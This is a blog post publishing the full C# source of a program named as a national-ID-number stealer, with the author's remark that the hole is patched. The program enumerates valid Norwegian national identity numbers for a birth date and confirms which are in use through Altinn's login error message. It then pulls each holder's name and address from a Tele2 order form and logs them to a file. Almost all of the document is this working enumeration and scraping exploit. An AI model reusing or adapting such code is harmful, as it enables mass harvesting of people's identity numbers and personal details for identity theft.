Source code for the Tele2 exploit

Written by vidarlo on 20070917 in with no comments.

If you would like to download this sourcecode as a file, you can do that by clicking here.

I should add that there’s really no point in compiling and running this code, as the hole is patched. It’s only placed here as a example.

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Net;
using System.Text.RegularExpressions;namespace Fødselsnummer_stjeler
{
    class Program
    {
        private static bool sjekkFødselsnummer(String fødselsnummer)
        {
            byte[] data = Encoding.ASCII.GetBytes("__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwtODE3MTQ0OTU2O3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDU%2BOz47bDx0PHA8cDxsPFZJRVdTVEFURV9PUkRFUlBJTlNURVA7PjtsPG88dD47Pj47PjtsPGk8MT47aTwzPjtpPDU%2BO2k8Nz47aTw5PjtpPDExPjtpPDEzPjtpPDIxPjtpPDI2PjtpPDI3PjtpPDI5PjtpPDMxPjtpPDM1PjtpPDM3Pjs%2BO2w8dDxwPGw8VGV4dDs%2BO2w8VmVsa29tbWVuIHRpbCBBbHRpbm4hOz4%2BOzs%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VGV4dDs%2BO2w8TG9nZyBpbm4gbWVkIHBhc3NvcmQ6Oz4%2BOzs%2BO3Q8cDxwPGw8VGV4dDs% 2BO2w8U3RlZyAxIGF2IDI7Pj47Pjs7Pjt0PHA8bDxpbm5lcmh0bWw7PjtsPEJydWsgZGl0dCBzZWx2dmFsZ3RlIHBh
c3NvcmQgb2cga2xpa2sgcMOlIFw8aVw% 2BRm9ydHNldHRcPC9pXD4ta25hcHBlbiBmb3Igw6UgYmVrcmVmdGUgZGluIGlkZW50aXRldCBtZWQgZW5nYW5nc2tv
ZGUuOz4%2BOzs%2BO3Q8cDxsPHN0eWxlOz47bDxIRUlHSFQ6NjBweFw7ZGlzcGxheTpub25lXDs7Pj47Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BO3Q8cDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs%2BOzs%2BO3Q8cDxwPGw8VGV4dDs%2BO2w8Rm9ydHNldHQgXD5cPjs%2BPjs%2BOzs%2BO3Q8O2w8aTwzPjtpPDU%2BO2k8Nz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PHA8cDxsPEltYWdlVXJsOz47bDwuLi8uLi9JbWFnZXMvQ19ib2tzLmdpZjs%2BPjs%2BOzs%2BOz4%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PHA8cDxsPEltYWdlVXJsOz47bDwuLi8uLi9JbWFnZXMvRF9ib2tzLmdpZjs%2BPjs%2BOzs%2BOz4%2BOz4%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47Pj47dDxwPHA8bDxOYXZpZ2F0ZVVybDs%2BO2w8Lzs%2BPjtwPGw8b25jbGljazs% 2BO2w8d2luZG93Lm9wZW4oJ0FsdGlubkhlbHAuYXNweCNpbm5sb2dnaW5nJywgJ19ibGFuaycsICd3aWR0aD04MDAs
IGhlaWdodD02MDAsIHJlc2l6YWJsZT15ZXMsIHRvb2xiYXI9bm8sIHNjcm9sbGJhcnM9eWVzJylcOyByZXR1cm4gZm
Fsc2VcOzs%2BPj47Oz47dDxwPHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOz47Oz47dDxwPHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4% 2BOz47Oz47Pj47Pj47Pj47bDxQaW5jb2RlU01TMTpSYWRpb0J1dHRvbkxpc3RMb2dpbkFsdGVybmF0aXZlc18wO1Bp
bmNvZGVTTVMxOlJhZGlvQnV0dG9uTGlzdExvZ2luQWx0ZXJuYXRpdmVzXzE7Pj4UnOEQeEcEjcIhShGzLKAd8PH%2Fsg%3D%3D&PincodeSMS1%3ARadioButtonListLoginAlternatives=1&PincodeSMS1%3AFnrTextBox=" + fødselsnummer + "&PincodeSMS1%3APasswordTextBox=&iebug=&PincodeSMS1%3AOrderSMSPinButton=Fortsett+%3E%3E");
Regex fødselsnummerReg = new Regex("<div id=\"PincodeSMS1_ErrorString\" class=\"userError\">Fødselsnummeret er feil.</div>");
HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://www.altinn.no/ega/Login/Login2.aspx");
            request.Method = "POST";
            request.ContentType = "application/x-www-form-urlencoded";
            request.ContentLength = data.Length;
            request.UserAgent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5";
            request.Referer = "https://www.altinn.no/ega/Login/Login2.aspx";
CookieContainer myContainer = new CookieContainer();
            request.CookieContainer = myContainer;
Stream postData = request.GetRequestStream();
            postData.Write(data, 0, data.Length);
            postData.Close();
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream Answer = response.GetResponseStream();
            StreamReader _Answer = new StreamReader(Answer);
String htmlBuffer = _Answer.ReadToEnd();
Match fødselsnummerMatch = fødselsnummerReg.Match(htmlBuffer);
if (fødselsnummerMatch.Success)
                return false;
            else
                return true;
}

private static String sjekkPersonalia(string fødselsnummer, string tele2)
        {
            byte[] data = Encoding.ASCII.GetBytes("trinn=2&fratrinn=2" + tele2 + "&personnummer=" + fødselsnummer);
HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://www.tele2.no/privat/mobil/bestill/index.cfm/mobil_kompis/?trinn=3" +tele2);
            request.Method = "POST";
            request.ContentType = "application/x-www-form-urlencoded";
            request.ContentLength = data.Length;
            request.UserAgent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5";
            request.Referer = "https://www.tele2.no/privat/mobil/bestill/index.cfm/mobil_kompis/?trinn=2" +tele2;
CookieContainer myContainer = new CookieContainer();
            request.CookieContainer = myContainer;
Stream postData = request.GetRequestStream();
            postData.Write(data, 0, data.Length);
            postData.Close();
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream Answer = response.GetResponseStream();
            StreamReader _Answer = new StreamReader(Answer);
String htmlBuffer = _Answer.ReadToEnd();
Regex regexForNavn = new Regex("<dd><input type=\"text\" name=\"fornavn\" id=\"mobil-bestilling-fornavn\" value=\"(?<fnavn>.+)\" disabled=\"disabled\" /></dd>");
            Regex regexEtterNavn = new Regex("<dd><input type=\"text\" name=\"etternavn\" id=\"mobil-bestilling-etternavn\" value=\"(?<enavn>.+)\" disabled=\"disabled\" /></dd>");
            Regex regexAdresse = new Regex("<dd><input type=\"text\" name=\"adresse\" id=\"mobil-bestilling-adresse\" value=\"(?<adresse>.+)\" disabled=\"disabled\" /></dd>");
            Regex regexPostnummer = new Regex("<dd><input type=\"text\" name=\"postnummer\" id=\"mobil-bestilling-postnummer\" value=\"(?<postnummer>.+)\" disabled=\"disabled\" /></dd>");
Match matchForNavn = regexForNavn.Match(htmlBuffer);
            Match matchEtterNavn = regexEtterNavn.Match(htmlBuffer);
            Match matchAdresse = regexAdresse.Match(htmlBuffer);
            Match matchPostnummer = regexPostnummer.Match(htmlBuffer);
String fornavn = matchForNavn.Groups["fnavn"].Value;
            String etternavn = matchEtterNavn.Groups["enavn"].Value;
            String adresse = matchAdresse.Groups["adresse"].Value;
            String postnummer = matchPostnummer.Groups["postnummer"].Value;
String allinfo = String.Format("{0} {1} - {2} {3}", fornavn, etternavn, adresse, postnummer);
return allinfo;
        }
static int Main(string[] args)
        {
            string tele2 = "";
try
            {
                FileStream filTele2 = new FileStream("tele2.txt", FileMode.Open, FileAccess.Read);
                StreamReader streamTele2 = new StreamReader(filTele2);
                tele2 = streamTele2.ReadToEnd();
                streamTele2.Close();
                filTele2.Close();
            }
            catch (Exception e)
            {
                Console.WriteLine("Advarsel: " + e.Message);
                return 0;
            }
Console.WriteLine("Vennligst skriv fødselsdatoen (ddmmåå): ");
            String fødselsdatoBuffer = Console.ReadLine();
            Console.WriteLine("Vil du hente ned tilhørende personalia? (0 = Nei, 1 = Ja): ");
            String personaliaSjekk = Console.ReadLine();
StreamWriter sw = new StreamWriter(new FileStream(fødselsdatoBuffer + ".txt", FileMode.Create, FileAccess.Write));
sw.WriteLine("####START OF FILE####");
int d1 = Convert.ToInt32(fødselsdatoBuffer.Substring(0, 1));
            int d2 = Convert.ToInt32(fødselsdatoBuffer.Substring(1, 1));
            int m1 = Convert.ToInt32(fødselsdatoBuffer.Substring(2, 1));
            int m2 = Convert.ToInt32(fødselsdatoBuffer.Substring(3, 1));
            int å1 = Convert.ToInt32(fødselsdatoBuffer.Substring(4, 1));
            int å2 = Convert.ToInt32(fødselsdatoBuffer.Substring(5, 1));
for (int i1 = 0; i1 < 10; i1++)
                for (int i2 = 0; i2 < 10; i2++)
                    for (int i3 = 0; i3 < 10; i3++)
                    {
                        if ((i3 % 2) == 1 || (i3 % 1) == 0)
                        {
                            int k1 = 11 - ((3 * d1 + 7 * d2 + 6 * m1 + 1 * m2 + 8 * å1 + 9 * å2 + 4 * i1 + 5 * i2 + 2 * i3) % 11);
                            if (k1 == 11)
                                k1 = 0;
int k2 = 11 - ((5 * d1 + 4 * d2 + 3 * m1 + 2 * m2 + 7 * å1 + 6 * å2 + 5 * i1 + 4 * i2 + 3 * i3 + 2 * k1) % 11);
                            if (k2 == 11)
                                k2 = 0;
if (k1 != 10 && k2 != 10)
                            {
                                String fødselsnummer = String.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}", d1, d2, m1, m2, å1, å2, i1, i2, i3, k1, k2);
                                if (sjekkFødselsnummer(fødselsnummer) == true)
                                {
                                    if (personaliaSjekk == "1")
                                    {
                                        String personalia = sjekkPersonalia(fødselsnummer, tele2);
                                        if (personalia.Length > 5)
                                        {
                                            Console.WriteLine(fødselsnummer + " - " + personalia);
                                            sw.WriteLine(fødselsnummer + " - " + personalia);
                                        }
                                        else
                                        {
                                            Console.WriteLine(fødselsnummer + " - KUNNE IKKE HENTE INFO!");
                                            sw.WriteLine(fødselsnummer + " - KUNNE IKKE HENTE INFO!");
                                        }
                                    }
                                    else
                                   {
                                        Console.WriteLine(fødselsnummer);
                                        sw.WriteLine(fødselsnummer);
                                    }
                                }
                                else
                                {
                                    Console.WriteLine(fødselsnummer + " - IKKE I BRUK!!");
                                    sw.WriteLine(fødselsnummer + " - IKKE I BRUK!!");
                                }
}
                       }
                    }
            sw.WriteLine("####END OF FILE####");
            sw.Close();
            return 0;
        }
    }

	

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.